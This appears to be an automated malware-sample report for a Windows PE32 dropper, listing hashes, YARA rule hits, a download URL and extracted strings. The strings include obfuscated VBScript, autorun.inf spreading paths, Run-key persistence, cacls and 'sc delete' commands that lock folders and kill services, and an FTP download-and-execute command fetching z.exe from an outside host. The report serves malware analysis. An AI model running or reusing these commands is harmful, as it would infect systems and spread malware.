Sample details: fbbc5f61d8a9918b816e476b17926b3a --

Hashes
MD5: fbbc5f61d8a9918b816e476b17926b3a
SHA1: 448a6a51afd6a31f973d58fff4ed85505a146946
SHA256: 75200766ec9ffd09e89ebc4ffe16945e5130959e9dc6691885dd218aa4e95113
SSDEEP: 768:0rpZ0+VUPD9fLoWAPeuCxPKbOZkZ8veIditV:0uAGuIPVyZ8GId4
Details
File Type: PE32
Yara Hits
YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/HasRichSignature | YRP/domain | YRP/contentis_base64 | YRP/Browsers | YRP/Dropper_Strings | YRP/Obfuscated_Strings | YRP/spreading_file | YRP/win_registry | YRP/win_token | YRP/win_private_profile | YRP/win_files_operation | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | FlorianRoth/DragonFly_APT_Sep17_3 |
Source
http://ossi4.51cto.com/attachment/201205/4594712_1336127240.rar
Strings
		!This program cannot be run in DOS mode.
\sq`Cwq
\rqn\sq9zxq
\sqRich
`.rdata
@.data
T$,RPQV
0Pjujf
USER32.dll
ADVAPI32.dll
SHLWAPI.dll
wsprintfA
GetWindowLongA
GetWindowTextA
GetClassNameA
VkKeyScanA
keybd_event
SetClipboardData
CloseClipboard
EmptyClipboard
OpenClipboard
IsWindow
GetForegroundWindow
MessageBoxA
RegCloseKey
RegSetValueExA
RegCreateKeyExA
RegDeleteValueA
RegOpenKeyA
RegQueryValueExA
LookupPrivilegeValueA
OpenProcessToken
SHDeleteKeyA
GetSystemDirectoryA
GetFileAttributesA
lstrcatA
GetPrivateProfileStringA
CloseHandle
WriteFile
CreateFileA
TerminateProcess
DeleteFileA
MoveFileExA
GetProcAddress
LoadLibraryA
WinExec
WritePrivateProfileStringA
ExitProcess
GetModuleHandleA
GetShortPathNameA
CreateDirectoryA
GetCommandLineA
SetFilePointer
SetFileTime
LocalFileTimeToFileTime
SystemTimeToFileTime
GetVersionExA
CreateThread
FreeLibrary
GetTickCount
lstrlenA
KERNEL32.dll
SHGetSpecialFolderPathA
SHELL32.dll
printf
strstr
??3@YAXPAX@Z
??2@YAPAXI@Z
MSVCRT.dll
WS2_32.dll
Netbios
NETAPI32.dll
DeleteUrlCacheEntry
WININET.dll
LocalAlloc
InterlockedExchange
RaiseException
GetLastError
_strlwr
HZ}gva}vg@{|agpfgN
FA_.{ggc)<<ddd=! '&=p|~<,xxxqrzwf
^|wzuzvw.Q#&'R'W "&#+PW#"%%
>qapkrv"NCLEWCEG? T@Qapkrv <
dwlavkml"Iic*ujmo+"
ml"gppmp"pgqwog"lgzv
uklfmu,omtgVm""/322./322
uklfmu,pgqkxgVm"2.2
`c`{`{? j ) v ) v ) r ) 8-- )ujmo"
Cl`w{l?`c`{`{
qgv"ickvmw?ApgcvgM`hgav* uq $ ap $ k $ rv,q $ j $ g $ n $ n +
ickvmw,PgeUpkvg" JIAW^Qmdvucpg^Okapmqmdv^Klvgplgv"Gzrnmpgp^Ockl^Qv $ cp $ v"Rceg ."Cl`w{l
ickvmw,PgeUpkvg" JIAW^Qmdvucpg^Okapmqmdv^Klvgplgv"Gzrnmpgp^Ockl^Qgcpaj"Rceg ."Cl`w{l
ickvmw,PgeUpkvg" JIAW^Qmdvucpg^Okapmqmdv^Klvgplgv"Gzrnmpgp^Ockl^fgdcwnv]rceg]wpn ."Cl`w{l
ickvmw,PgeUpkvg" JINO^Qmdvucpg^Okapmqmdv^Uklfmuq^AwppglvTgpqkml^Pwl^qcdg142 . A8^Rpmepco"Dkngq^Amooml"Dkngq^qd`q`t{^amkmog,gzg 
Glf"Dwlavkml
ml"gppmp"pgqwog"lgzv
>-qapkrv<
>qapkrv"NCLEWCEG? T@Qapkrv <
Acnn"Iic* uuu,0167,amo-=ii ) i`ckfw +
uklfmu,anmqg"
>-qapkrv<
Kernel32.dll
Advapi32.dll
shell32.dll
user32.dll
IMM32.dll
Psapi.dll
Bwr,\p
wFvWH.
^IXVA]V_ !=W__
_|rw_zqarajR
TvgCa|pRwwav``
UfRiI@
ih&cttit&tcuskc&Hc~r
o`&.jeguc.toanr.quetovr(`sjjhgkc*77//;$quetovr(c~c$/&rnch
ucr&idlUncjj;quetovr(etcgrcIdlcer.$quetovr(uncjj$/
idlUncjj(Tsh.$ekb(c~c&)m&euetovr&))hijiai&$ ent.52/ quetovr(uetovr`sjjhgkc ent.52//
quetovr(wsor
chb&O`
`sheroih&sugac./
quetovr(ceni&$$
quetovr(ceni&$&&&&&&&&&&&&&&&&&&QKO&c~ce&Eikkghbu$
quetovr(ceni&$$
quetovr(ceni&$YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY$
quetovr(ceni&$suc<$
quetovr(ceni&$euetovr&$ quetovr(uetovrhgkc $&:OV&rgtacru8&:sucthgkc8&:vguuqitb8&:eikkghbu8$
quetovr(ceni&$YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY$
chb&@sheroih
o`&quetovr(gtaskchru(eishr:5&rnch&
&&&sugac./&
&&&quetovr(ceni&$Vgtgkcrctu&Qtiha&
&&&quetovr(wsor&
chb&o`&&
ovgbbtcuu;quetovr(gtaskchru.6/
sucthgkc;quetovr(gtaskchru.7/
vguuqitb;quetovr(gtaskchru.4/
eikkghbu;quetovr(gtaskchru.5/
o`&vguuqitb;ent.52/ ent.52/&rnch&vguuqitb;Hsjj
o`&vguuqitb;$$&rnch&vguuqitb;Hsjj
sugac./&
quetovr(ceni&$ivch&$ ovgbbtcuu $oha*Qgor((($
ucr&idljiegrit;etcgrcidlcer.$qdckuetovroha(uqdckjiegrit$/&!46&
ucr&idluqdckuctpoecu;idljiegrit(eihhceructpct.ovgbbtcuu*$tiir)eokp4$*sucthgkc*vguuqitb/
o`&cttithskdct:86&rnch&
&&&quetovr(ceni&$Ivch&@gojstc'$&
&&&quetovr(wsor
&&&cjuc&
&&&quetovr(ceni&$Ivch&Useecuu'$&
chb&o`
idluqdckuctpoecu(ucestor
Y(vtopojcacu(gbb&45*rtsc&
idluqdckuctpoecu(ucestor
Y(vtopojcacu(gbb&7>*rtsc&
idluqdckuctpoecu(ucestor
Y(vtopojcacu(gbb&1*rtsc&
egjj&eikkghb./
`sheroih&eikkghb./
quetovr(ceni&$C~ce&eikkghbu&oha(((($
&&&ucr&idlohurghec;idluqdckuctpoecu(acr.$qoh54Yvtiecuu$/
&&&ucr&idlkcrnib;idlohurghec(kcrnibuY.$etcgrc$/
&&&ucr&idlohvgtgk;idlkcrnib(ohvgtgkcrctu(uvgqhohurghecY./
&&&idlohvgtgk(eikkghbjohc;eikkghbu
&&&ucr&idlisrvgtgk;idlohurghec(c~cekcrnibY.$etcgrc$*idlohvgtgk/
&&&o`&idlisrvgtgk(tcrsthpgjsc:86&rnch
&&&&&quetovr(ceni&$C~ce&@gojstc'$
&quetovr(wsor
&&&cjuc
&&&&&quetovr(ceni&$C~ce&Useecuu'$
&&&chb&o`
&&&quetovr(ceni&$VOB
$ idlisrvgtgk(vtiecuuob
&&&quetovr(ceni&ovgbbtcuu $C~ce&Eikkghbu&Useecuu''''''$ pdetj`
&&&quetovr(wsor&
chb&@sheroih&
InternetOpenA
Wininet.dll
InternetReadFile
InternetCloseHandle
InternetOpenUrlA
\Fonts\op.ini
error no RegSetValueEx %s
error no RegCreateKeyEx %s
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Explorer.exe
\w3wp.exe
C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME%
f:\w3wp.exe
e:\w3wp.exe
d:\w3wp.exe
c:\w3wp.exe
f:\autorun.inf
e:\autorun.inf
d:\autorun.inf
c:\autorun.inf
\vdswho.nls
\vdswho.dll
\pagefile.exe
\UoDo\game.dll
\ModFan\mone.dll
HTTP\shell\open\command
"C:\Program Files\Internet Explorer\iexplore.exe" -nohome
%s\360
%s\hao123.url
C:\WINDOWS\
SogouI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\WINDOWS\Qedie\conime.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run
SOFTWARE\Microsoft\Active Setup\Installed Components\{AENGFU3AA-B933-11d2-9CBD-0000F87A369E}
cmd /c cacls "C:\Program Files\Common Files\Microsoft Shared\MSInfo" /e /p everyone:n
\common files\Microsoft Shared\MSInfo\iejore.exe
cmd /c cacls "C:\Documents and Settings\All Users\Application Data\Storm\update" /e /p everyone:n
cmd /c sc delete HidServ
cmd /c sc stop HidServ
c:\windows\QQSAFER.EXE
cmd /c sc delete IE_WinserverName
cmd /c sc stop IE_WinserverName
c:\windows\system32\tccj.dll
cmd /c sc delete LYTC
cmd /c sc delete Messenger
cmd /c sc stop Messenger
cmd /c sc stop LYTC
cmd /c taskkill /im conime.exe /f
cmd /c taskkill /im iejore.exe /f
cmd /c sc delete JavaServe
%02X%02X%02X%02X%02X%02X
Forthgoer
%sp?mac=%s&ver=01&t=%s
%c%c%c%c%c%c%c
%s\%c%c%c.hta
DbgUiDebugActiveProcess
ntdll.dll
cmd /c %s %s %s administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&z.exe&z.exe&del z.exe"
%s %s %s
%d.%d.%d.%d
buffer
%s\Tasks\%c%c%cy.vbe
%s\system32\cscript.exe
%s\Tasks\%c%c%c9.exe
HrCg@b	g